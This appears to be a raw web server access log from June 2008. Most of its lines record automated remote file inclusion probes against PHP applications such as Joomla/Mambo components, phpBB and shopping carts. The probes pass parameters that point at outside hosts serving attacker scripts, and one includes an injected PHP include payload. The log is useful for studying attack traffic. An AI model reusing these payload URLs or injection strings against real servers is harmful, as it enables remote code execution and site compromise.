89.108.67.119 - - [11/Jun/2008:10:56:17 -0700] "GET /errors.php?error=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [11/Jun/2008:10:56:19 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [11/Jun/2008:10:56:21 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.153.109 - - [11/Jun/2008:10:57:58 -0700] "GET /logs/access_080312.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.153.109 - - [11/Jun/2008:10:57:58 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.153.109 - - [11/Jun/2008:10:57:59 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:10:58:38 -0700] "GET /logs/access_080312.log//errors.php?error=http://www.indigonetzwerk.de/mambo/editor/id1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.251.172 - - [11/Jun/2008:10:58:50 -0700] "GET //errors.php?error=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [11/Jun/2008:10:59:07 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [11/Jun/2008:10:59:07 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:10:59:38 -0700] "GET /logs/phphtml.php?htmlclass_path=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:10:59:38 -0700] "GET /phphtml.php?htmlclass_path=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.133.122 - - [11/Jun/2008:10:59:42 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.holzwerkstatt-mazur.de//smile.gif?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
74.6.18.247 - - [11/Jun/2008:10:59:45 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.247 - - [11/Jun/2008:10:59:45 -0700] "GET /logs/access_080418.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.93.133.122 - - [11/Jun/2008:10:59:46 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.holzwerkstatt-mazur.de//smile.gif?? HTTP/1.1" 200 3694 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:11:00:01 -0700] "GET /logs/access_080330.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:11:00:02 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:11:00:02 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
72.55.153.109 - - [11/Jun/2008:11:00:03 -0700] "GET /logs/access_080118.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:11:00:04 -0700] "GET /logs/phphtml.php?htmlclass_path=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:11:00:04 -0700] "GET /phphtml.php?htmlclass_path=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.11.230.55 - - [11/Jun/2008:11:00:29 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
66.11.230.55 - - [11/Jun/2008:11:00:32 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:11:01:20 -0700] "GET /logs/access_080429.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:11:01:31 -0700] "GET /logs/index3.php?root=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:11:01:32 -0700] "GET /index3.php?root=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:11:01:32 -0700] "GET /logs/index3.php?root=http://www.acadie-contest.com/cmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:11:01:33 -0700] "GET /index3.php?root=http://www.acadie-contest.com/cmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.185.237.149 - - [11/Jun/2008:11:02:54 -0700] "GET //errors.php?error=http://www.geocities.com/vianarina/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.185.237.149 - - [11/Jun/2008:11:02:54 -0700] "GET /logs//errors.php?error=http://www.geocities.com/vianarina/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
190.54.28.163 - - [11/Jun/2008:11:03:57 -0700] "GET /logs/start.php?s=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.28.163 - - [11/Jun/2008:11:04:02 -0700] "GET /start.php?s=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:11:04:08 -0700] "GET /logs//errors.php?error=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:11:04:08 -0700] "GET //errors.php?error=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:11:04:23 -0700] "GET /logs/access_080103.log/index1.php?site=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:11:04:24 -0700] "GET /logs/access_080103.log/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:11:04:24 -0700] "GET /index1.php?site=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:11:04:25 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:11:04:25 -0700] "GET /logs/index1.php?site=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:11:04:25 -0700] "GET /logs/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:04:43 -0700] "GET /logs/access_071209.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:04:44 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:04:44 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:04:44 -0700] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
130.102.113.158 - - [11/Jun/2008:11:04:47 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.172.175.130 - - [11/Jun/2008:11:04:57 -0700] "GET /logs/access_071209.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [11/Jun/2008:11:04:57 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [11/Jun/2008:11:04:58 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [11/Jun/2008:11:04:58 -0700] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:11:05:15 -0700] "GET /logs/access.log//squirrelcart/cart_content.php?cart_isp_root=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:11:05:15 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:11:05:15 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:05:28 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:05:28 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.214.109.12 - - [11/Jun/2008:11:05:44 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.109.12 - - [11/Jun/2008:11:05:45 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.109.12 - - [11/Jun/2008:11:05:45 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:11:05:45 -0700] "GET /logs/access_080215.log/index1.php?site=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.214.109.12 - - [11/Jun/2008:11:05:45 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:11:05:47 -0700] "GET /logs/access_080215.log/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
130.102.113.158 - - [11/Jun/2008:11:05:49 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.109.12 - - [11/Jun/2008:11:05:51 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.109.12 - - [11/Jun/2008:11:05:51 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.175.130 - - [11/Jun/2008:11:06:50 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [11/Jun/2008:11:06:50 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
87.106.98.71 - - [11/Jun/2008:11:07:07 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [11/Jun/2008:11:07:08 -0700] "GET /phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:07:49 -0700] "GET /logs/access.log/header.php?mainpath=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:07:49 -0700] "GET /header.php?mainpath=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:07:50 -0700] "GET /logs/header.php?mainpath=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.18.247 - - [11/Jun/2008:11:08:15 -0700] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.247 - - [11/Jun/2008:11:08:55 -0700] "GET /logs/?N=D HTTP/1.0" 200 51401 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.130.242.135 - - [11/Jun/2008:11:10:08 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.98.71 - - [11/Jun/2008:11:10:23 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [11/Jun/2008:11:10:24 -0700] "GET /phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.31 - - [11/Jun/2008:11:10:38 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.31 - - [11/Jun/2008:11:10:38 -0700] "GET /bikes/GPS/?S=D HTTP/1.1" 200 816 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:11:10:48 -0700] "GET /logs/access_080118.log//errors.php?error=http://www.indigonetzwerk.de/mambo/editor/id1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:11:10:49 -0700] "GET //errors.php?error=http://www.indigonetzwerk.de/mambo/editor/id1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:11:10:49 -0700] "GET /logs//errors.php?error=http://www.indigonetzwerk.de/mambo/editor/id1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:11:11:39 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.101.24 - - [11/Jun/2008:11:12:20 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [11/Jun/2008:11:12:20 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [11/Jun/2008:11:12:20 -0700] "GET /phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [11/Jun/2008:11:12:20 -0700] "GET /phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:11:12:24 -0700] "GET /phphtml.php?htmlclass_path=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:11:12:25 -0700] "GET /phphtml.php?htmlclass_path=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:12:38 -0700] "GET /logs/access_080513.log/header.php?mainpath=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:12:39 -0700] "GET /header.php?mainpath=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:12:39 -0700] "GET /logs/header.php?mainpath=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:12:45 -0700] "GET /logs/phphtml.php?htmlclass_path=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:12:46 -0700] "GET /phphtml.php?htmlclass_path=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:11:12:57 -0700] "GET //errors.php?error=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:11:12:57 -0700] "GET /logs//errors.php?error=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
212.227.251.172 - - [11/Jun/2008:11:13:24 -0700] "GET /phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.251.172 - - [11/Jun/2008:11:13:24 -0700] "GET /phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:11:13:55 -0700] "GET /logs/access_080309.log/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:11:13:56 -0700] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:11:13:56 -0700] "GET /logs/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.67.79 - - [11/Jun/2008:11:13:58 -0700] "GET / HTTP/1.1" 200 18257 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
87.106.209.176 - - [11/Jun/2008:11:14:29 -0700] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.209.176 - - [11/Jun/2008:11:14:29 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:11:14:42 -0700] "GET /logs/access_080312.log//oneadmin/photogallery/include.php?path[docroot]=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:11:14:43 -0700] "GET /logs/access_080312.log/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:11:14:43 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:11:14:44 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:11:14:44 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:11:14:44 -0700] "GET /logs/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.67.20.173 - - [11/Jun/2008:11:15:28 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [11/Jun/2008:11:15:29 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [11/Jun/2008:11:15:29 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
